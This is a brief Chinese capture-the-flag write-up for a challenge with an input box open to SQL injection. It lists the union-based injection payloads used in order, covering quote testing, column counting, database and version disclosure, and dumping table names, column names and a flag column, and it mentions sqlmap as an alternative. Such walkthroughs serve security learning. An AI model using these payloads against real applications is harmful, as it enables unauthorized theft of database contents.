题目
有框sql加xss
输入1'
1' and 1=1#
1''和1' and 1=1#回显正常
判断为单引号字符注入
爆字段
1' order by 3# 正常
1' order by 4# 报错确定字段为3
爆显位
-1' union select 1,2,3-- - 在这里# --+ 好像被过滤了没有回显
爆数据库名和版本
-1' union select 1,database(),version()-- -
爆表名
-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='news'-- -
-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='news'-- -
爆字段
-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='news' and table_name='secret_table' -- -
爆数据
-1' union select 1,group_concat(id,fl4g),3 from news.secret_table -- -
-1' union select 1,group_concat(id,0x5c,fl4g),3 from news.secret_table -- -
-1' union select 1,group_concat(fl4g),3 from news.secret_table -- -
或者sqlmap跑